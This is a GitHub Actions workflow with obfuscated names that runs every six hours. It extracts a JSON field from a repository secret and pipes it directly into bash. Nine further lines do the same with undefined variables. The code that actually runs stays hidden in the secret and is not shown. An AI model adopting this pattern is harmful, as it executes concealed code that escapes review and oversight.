name: yuedagushun

on:
  workflow_dispatch:
  schedule:
    - cron: '1 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuedagushun
        env:
          odq89343: ${{ secrets.odq89343 }}
        run: |
          echo $odq89343 | jq -r .rsz22 | /bin/bash
          echo $gkcq0 | jq -r .rk008 | /bin/bash
          echo $z834 | jq -r .o5899 | /bin/bash
          echo $vqs41 | jq -r .n54 | /bin/bash
          echo $r1 | jq -r .jwv9991 | /bin/bash
          echo $jmy5 | jq -r .a406 | /bin/bash
          echo $hbe5734 | jq -r .gbkiz2 | /bin/bash
          echo $c8 | jq -r .xee28002 | /bin/bash
          echo $tkcf1 | jq -r .wgmy27 | /bin/bash
          echo $v32 | jq -r .l8 | /bin/bash

